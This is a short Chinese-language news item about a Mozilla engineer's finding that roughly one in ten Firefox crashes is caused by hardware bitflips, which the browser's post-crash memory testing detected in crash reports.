Mozilla Staff Platform Engineer Gabriele Svelto 称十分之一的 Firefox 崩溃是比特翻转导致的。比特翻转(Bitflips)是指储存在电子设备上的个别比特发生翻转的事件,比如从 0 变为 1 或反之亦然。导致比特翻转的自然因素主要包括宇宙射线、功率波动和温度等。Firefox 去年部署了浏览器崩溃后在用户电脑上运行的内存测试工具。上周 Firefox 收到了 47 万份崩溃报告。崩溃报告是用户自愿递交的,因此实际崩溃数量通常会是报告的数倍。47 万份崩溃报告中约 2.5 万份检测到可能是比特翻转导致的。意味着每 20 次崩溃中就有一次可能是由内存不稳定或间歇性出错导致的。由于检测方法非常保守,实际数量至少是两倍,即十分之一。Gabriele Svelto 指出硬件不稳定的用户比硬件稳定的用户更可能遭遇崩溃。他表示今天的笔记本电脑和智能手机的内存通常是焊在设备上,要更换基本上不可能。